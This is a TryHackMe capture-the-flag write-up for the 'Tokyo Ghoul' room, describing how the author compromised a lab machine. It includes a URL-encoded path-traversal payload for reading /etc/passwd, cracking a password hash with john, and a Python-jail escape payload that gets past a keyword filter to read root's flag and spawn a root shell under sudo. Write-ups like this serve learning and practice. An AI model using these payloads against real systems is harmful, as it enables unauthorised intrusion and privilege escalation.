TryHackMe: Tokyo Ghoul

TryHackMe: Tokyo Ghoul by devalfo & rockyou.txt

Task 1 About the room

This room took a lot of inspiration from psychobreak , and it is based on Tokyo Ghoul anime.

Alert: This room can contain some spoilers 'only s1 and s2 ' so if you are interested to watch the anime, wait till you finish the anime and come back to do the room

The machine will take some time, just go grab some water or make a coffee.

This room contains some non-pg13 elements in the form of narrative descriptions. Please proceed only at your own comfort level.

Read the above - Done

Deploy the machine - Done

Task 2 Where am i ?

Use nmap to scan all ports

Let's break out rustscan and see how many ports we have open.

╰─⠠⠵ rustscan -a ghoul --ulimit 10000 -- -sC -sV -oA ghoul -A -v
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/tony/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.217.191:[REDACTED]
.....
.....
Open 10.10.217.191:[REDACTED]

How many ports are open ?

From the above scan we see how many ports are open.

Answer: [REDACTED]

What is the OS used ?

From both ssh and apache information returned from our rustscan/nmap we can see the operating system.

Answer: [REDACTED]

Task 3 Planning to escape

Did you find the note that the others ghouls gave you? where did you find it ?

Browsing to http://ghoul we see a link at the bottom of the page that goes to [REDACTED].[REDACTED]

Answer: [REDACTED].[REDACTED]

What is the key for Rize executable?

Using view-source on the above page gives us a comment

	<!-- look don't tell jason but we will help you escape , here is some clothes to look like us and a mask to look anonymous and go to the ftp room right there you will find a freind who will help you -->

Taking this hint we jump over to ftp and login as anonymous

╰─⠠⠵ ftp ghoul
Connected to ghoul.
220 (vsFTPd 3.0.3)
Name (ghoul:tony): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Looking around we find need_to_talk which is a binary. Let's grab with get, make it executable chmod +x and run it

╰─⠠⠵ ./need_to_talk 
Hey Kaneki finnaly you want to talk 
Unfortunately before I can give you the kagune you need to give me the paraphrase
Do you have what I'm looking for?

> 

Ok, looks like we need to enter something, running strings across the binary we can see [REDACTED] above the text

Using this we get the below

Good job. I believe this is what you came for:
[REDACTED]

Answer: [REDACTED]

Use a tool to get the other note from Rize.

Another file found on the ftp is rize_and_kaneki.jpg

Running steghide against this jpg with the key found above we get a note.

╰─⠠⠵ steghide extract -sf rize_and_kaneki.jpg 
Enter passphrase: 
wrote extracted data to "yougotme.txt".

╰─⠠⠵ cat yougotme.txt 
haha you are so smart kaneki but can you talk my code 

[REDACTED]
[REDACTED]
[REDACTED]
[REDACTED]
[REDACTED]
[REDACTED]
[REDACTED]
[REDACTED]

if you can talk it allright you got my secret directory 

Throwing this into cyberchef we get the below.

Answer: Not Needed but we note: [REDACTED]

Task 4 What Rize is trying to say?

What the message mean did you understand it ? what it says?

Taking the output from Cyber Chef from the previous question we get the answer.

Answer: [REDACTED]

Can you see the weakness in the dark ? no ? just search

Using gobuster we find the subdirectory [REDACTED]

╰─⠠⠵ gobuster -m dir -u http://ghoul/[REDACTED]/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,php,zip,bak,sql,sqlite,tar,tgz,tar.gz

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://ghoul/[REDACTED]/
[+] Threads      : 10
[+] Wordlist     : /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php,bak,sql,tgz,txt,sqlite,tar,tar.gz,zip
[+] Timeout      : 10s
=====================================================
2021/03/14 23:33:01 Starting gobuster
=====================================================
/[REDACTED] (Status: 301)

Answering yes or no results in being redirected to /index.php?view=flower.gif .... This smells like an lfi... Let's try ../../../../../../..//etc/passwd

Damn.... trying the usual php://filter tactic does not work either ... Lets try and URL Encode the lfi..

%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd

What did you find something ? crack it

From the above we have the password hash

[REDACTED]

what is rize username ?

From the /etc/passwd we can see the username with a password is [REDACTED]

Answer: [REDACTED]

what is rize password ?

Cracking the password above with john

╰─⠠⠵ john passwd --wordlist=rockyou.txt
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED]      (?)
1g 0:00:00:04 100% 0.2183g/s 314.4p/s 314.4c/s 314.4C/s teacher..michel
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Answer: [REDACTED]

Task 5 Fight Jason

user.txt

Using the username and password above we can ssh into the box and read the user.txt found in our home directory

[REDACTED]@vagrant:~$ cat user.txt 
[REDACTED]

Answer: [REDACTED]

root.txt

Running sudo -l we can see the below

[REDACTED]@vagrant:~$ sudo -l
[sudo] password for [REDACTED]: 
Matching Defaults entries for [REDACTED] on vagrant.vm:
    env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User [REDACTED] may run the following commands on vagrant.vm:
    (ALL) /usr/bin/python3 /home/[REDACTED]/jail.py

Checking the permission we do not have write access on /home/[REDACTED]/jail.py so we can not just change the file

[REDACTED]@vagrant:~$ ls -l /home/[REDACTED]/jail.py
-rw-r--r-- 1 root root 588 Jan 23 22:27 /home/[REDACTED]/jail.py

Let's take a look at the python script

#! /usr/bin/python3
#-*- coding:utf-8 -*-
def main():
    print("Hi! Welcome to my world kaneki")
    print("========================================================================")
    print("What ? You gonna stand like a chicken ? fight me Kaneki")
    text = input('>>> ')
    for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
        if keyword in text:
            print("Do you think i will let you do this ??????")
            return;
    else:
        exec(text)
        print('No Kaneki you are so dead')
if __name__ == "__main__":
    main()

Looking at the above we can not use any of our normal verbs. Doing some Insert Search Engine Verb Here I come across https://anee.me/escaping-python-jails-849c65cf306e?gi=a7d3bac81831. Looking at the escapes at the bottom of the page I modify it to the below.

__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('cat /root/root.txt')

So let's run it...

[REDACTED]@vagrant:~$ sudo /usr/bin/python3 /home/[REDACTED]/jail.py
[sudo] password for [REDACTED]: 
Hi! Welcome to my world kaneki
========================================================================
What ? You gonna stand like a chicken ? fight me Kaneki
>>> __builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('cat /root/root.txt')
[REDACTED]
No Kaneki you are so dead
[REDACTED]@vagrant:~$ 

Answer: [REDACTED]

Of course we could also modify it to give us a root shell using the following:

__builtins__.__dict__['__IMPORT__'.lower()]('PTY'.lower()).__dict__['SPAWN'.lower()]('/bin/bash')
[REDACTED]@vagrant:~$ sudo /usr/bin/python3 /home/[REDACTED]/jail.py
Hi! Welcome to my world kaneki
========================================================================
What ? You gonna stand like a chicken ? fight me Kaneki
>>> __builtins__.__dict__['__IMPORT__'.lower()]('PTY'.lower()).__dict__['SPAWN'.lower()]('/bin/bash')
root@vagrant:~# 

Task 6 Special thanks

You can contact me on my discord : 0UR4N05#6231

Congratulations you've complete Tokyo ghoul room 1. This is the first room I've ever created so If you enjoyed it please give me a follow up on twitter and send me your feedback in twitter or discord , and i'll be so grateful if you like this room and share it with your friends , thank you .

Thank you

Answer: Not needed

Done

BOOM!!!!, another room completed. Was good fun and required a mix of skills to get to the root flag. Also found an unintended which I reported to the room creator.

Unintended Root

The server was built using vagrant and this default user was left there with sudo

vagrant@vagrant:~$ sudo -l
Matching Defaults entries for vagrant on vagrant.vm:
    env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vagrant may run the following commands on vagrant.vm:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

Using this user we can gain a root shell using sudo -i and read /root/root.txt

root@vagrant:~# cat /root/root.txt 
[REDACTED]